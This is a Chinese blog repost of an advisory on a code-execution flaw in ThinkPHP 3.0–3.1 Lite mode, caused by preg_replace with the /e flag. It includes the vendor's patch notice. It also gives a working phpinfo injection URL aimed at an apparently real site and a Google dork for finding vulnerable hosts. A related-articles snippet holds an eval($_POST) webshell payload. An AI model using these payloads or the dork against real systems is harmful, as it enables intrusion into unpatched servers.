Thinkphp 3.0-3.1版代码执行漏洞

最新推荐文章于 2024-05-21 13:12:55 发布
最新推荐文章于 2024-05-21 13:12:55 发布
阅读量1.8k 收藏 1
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/im404/p/3611177.html
版权

近日360库带计划中播报的ThinkPHP扩展类库的漏洞已经查明原因:系官方扩展模式中的Lite精简模式中存在可能的漏洞(原先核心更新安全的时候 并没有更新模式扩展部分,现已更新)。
对于使用标准模式或者其他模式的用户不存在此漏洞,敬请放心。3.2版本已经对扩展重新设计(原来的模式扩展、引擎扩展均不再支持),也不存在此问题。
请有使用ThinkPHP3.0~3.1版本的Lite模式的用户注意更新。
Lite模式扩展包下载地址:http://www.thinkphp.cn/extend/219.html

360库带计划:http://loudong.360.cn/vul/info/id/2919

th1
ThinkPHP 开启lite模式后,会加载ThinkPHP/Extend/Mode/Lite/Dispacher.class.php去匹配URL并分发用户请求, 而在该文件的65行使用perg_replace函数的 /e参数,
th2
第二个参数引用的时候使用了双引号,从而导致代码执行。

测试:http://www.rru-gz.com/index.php/Index/index/name/$%7B@phpinfo%28%29%7D

th3

 

 

Google语法:

inurl:index.php intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework }  禁止用在非法用途

 

[via@0day5]

转载于:https://www.cnblogs.com/im404/p/3611177.html

weixin_30342209
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp 3.1.3 php本,ThinkPHP 3.1、3.2一个通用的漏洞分析
weixin_39606638的博客
03-10 3828
Author:m3d1t10n前两天看到phithon大大在乌云发的关于ThinkPHP漏洞,想看看是什么原因造成的。可惜还没有公开,于是就自己回来分析了一下。0x00官方补丁(DB.class.php parseWhereItem($key,$val))注意红色框框起来的部分0x01分析preg_match('/IN/i',$val[0]) //该正则没有起始符和终止符,xxxxinxxxxx...
Thinkphp漏洞
weixin_43873557的博客
02-06 999
Thinkphp介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持 windows/Unix/Linux等服务器环境。 ➢ Thinkphp应用 很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。 ➢历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell ThinkPHP5_SQL注入漏洞&&敏感信息泄露 ThinkPHP3.2.3_最新update注入漏洞 Thin
Thinkphp 漏洞小试
weixin_30532987的博客
01-23 207
首先确定这个网站使用thinkphp的框架 国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多本,如何才能知道我们使用的框架是哪个本的呢? 在URL后面加thinkphp的目录,也有可能爆出来 这是一个tankphp的网站目录。供参考 admin是后台工程文件夹 home是前台工程 public里面用于存放CSS文件,JS...
解决方案-thinkphp3.1漏洞-详细白客自学路线
最新发布
2401_84915584的博客
05-21 631
我正在参加「掘金·启航计划」前言,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露
thinkphp3.0在url规则方面的一个bug
weixin_30307921的博客
09-11 77
启动流程的dispatch在加载模块配置之前,就是说如果在项目里添加url_model此时没有加载; 在dispatch里面定义了一堆常量,例如__APP__等,使用U方法或者模板使用__URL__时,使用的是thinkphp的环境配置里的url_model。 这个在去掉index.php的时候发现的,只有设置环境配置的url_model=2,也就是rewrite模式才能是使用U,或者__UR...
thinkphp任意代码执行漏洞
cnbird's blog
05-16 9931
http://site.com/index.php/module/action/param1/${@phpinfo()} 直接拿SHELL index.php/module/action/param1/${@eval%28$_POST[c]%29} 密码:c
thinkphp3.1.3 内存问题
集思广益
07-18 140
Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 35 bytes) in E:\wamp\huike\ThinkPHP\Common\common.php on line 650   <?php ini_set("memory_limit","12M");   //ech...
Thinkphp3全漏洞分析
灰太的表格的博客
01-23 6235
thinkphp3.1漏洞_浅谈Thinkphp3.2.3反序列化漏洞_小白漏洞笔记
程序员六七的博客
05-16 529
我正在参加「掘金·启航计划」前言,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP 2.x/3.0 漏洞复现
Knsec
06-04 1825
ThinkPHP 2.x/3.0漏洞复现
thinkphp远程代码执行exp
07-29
thinkphp的远程代码执行漏洞的exp,本通用,带检查,上传等功能。
ThinkPHP框架漏洞
谢公子的博客
04-08 3303
ThinkPHP ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名为FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和Act...
thinkphp3.1.3 getshell_两个weblogic的漏洞的Getshell验证
weixin_39873456的博客
11-11 899
本文复现了weblogic的Weblogic CVE-2019-2725和Weblogic CVE-2017-10271两个漏洞,从批量扫描到Getshell的整个过程。主要侧重如何构造Payload去GetShell(所以扫描工具和命令执行的截图是网图),批量扫描和命令执行直接找weblogic在github的几款工具即可。在这里就不分享了,只分享payload请求代码。有问题可以留言。Webl...
ThinkPHP_3.1.3 SQL注入漏洞复现
weixin_44611282的博客
05-22 8700
首先在网上下载对应的压缩包。 漏洞位于ThinkPHP/Lib/Core/Model.class.php 文件的parseSql函数 将这一条修复语句注释后开始一步步复现 在ThinkPHP目录下创建app文件夹后创建index.php 访问相应页面,显示这个则说明成功。 成功后app文件夹下会生成工程文件 然后开始配置数据库(在app/conf/config.php下配置) <?php return array( //'配置项'=>'配置值' // 添加数据库配置信息 'DB_TYPE
ThinkPHP漏洞详解(自学)
m0_64481831的博客
03-01 2720
Thinkphp是一个快速、兼容而且简单的轻量级PHP开发框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式需要PHP 5.0以上本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨本以及简单易用的PHP框架。Thinkphp发展至今,主要有2.x、3.x、5.x、6.x系列,其中2.x和3.x系列官方已停止维护,5.x系列是目前使用最多的一个系列,而3.x系列比较多的老用户。
ThinkPHP中的BUG及技巧
kevin
12-03 2043
ThinkPHP中的BUG及技巧与策:1. 模板中不能使用的标签{$content} {$i}2. If标签如: 试验后总是有想不到的错误, 这样,还不如直接用来得快些呢.约定:1.所有类库文件必须使用.class.php作为文件后缀,并且类名和文件名保持一致2.控制器的类名以Action为后缀3.模型的类名以Model为后缀,类名第一个字母须大写4.数据库表名全部采用小写,如:数据表名: 前缀_
PHP代码审计之再探 TP3 漏洞
Love&Share
01-13 1515
之前写过关于 TP 漏洞的文章,只是时间久远,记忆不是很深刻,这次来复习温故知新 文章目录TP 3.2 信息泄露配置环境日志信息泄露缓存泄露指纹识别TP 3.2错误写法导致SQL注入exp 表达式TP 3.2 update\bind注入TP 3.2 find注入 TP 3.2 信息泄露 配置环境 数据库连接配置 # application/home/controller/IndexController.class <?php namespace Home\Controller; use Think.
ThinkPHP 3.1中的SQL注入漏洞分析----论ThinkPHP 3.1中的半吊子的PDO封装
老张的自言自语
04-19 436
  ThinkPHP 3.1中的SQL注入漏洞分析----论ThinkPHP 3.1中的半吊子的PDO封装   我总结ThinkPHP的PDO封装可以用买椟还珠来下结论,表面上封装了PDO支持,但实际却并没有使用到PDO的精髓部分,这不是买椟还珠是什么呢?     花了一些时间了解到ThinkPHP 3.1框架,其官方网站上对其描述得相当不错,但随着我阅读其代码,事实并不是想象...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值